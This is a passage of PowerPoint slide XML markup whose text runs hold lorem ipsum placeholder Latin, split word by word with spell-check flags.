              <a:t>erat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>massa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lacinia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>laoreet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>massa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Phasellus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>finibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malesuada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lobortis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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tellus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nulla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mollis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iaculis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Nam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auctor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>molestie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rhoncus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>orci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rhoncus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>orci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>velit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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pulvinar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ac, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ultrices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dui. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Praesent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>commodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>odio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ullamcorper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eleifend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, magna </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod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, in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>porttitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nulla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Donec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>egestas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nulla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sollicitudin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nulla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lacinia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ac. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pellentesque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>felis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tincidunt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> id, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rutrum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>odio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fringilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>porttitor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. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>massa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eleifend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dui, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> tempus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sapien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>justo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>convallis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lacinia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>felis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>luctus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>odio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eleifend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rutrum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>orci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,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molestie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>enim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>augue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lorem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>volutpat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sagittis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> quam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>varius</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>facilisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Donec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tincidunt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>placerat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>velit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sagittis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>erat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r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facilisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Duis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>molestie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>enim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scelerisque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Curabitur</a:t>
            </a:r>
            <a:r>
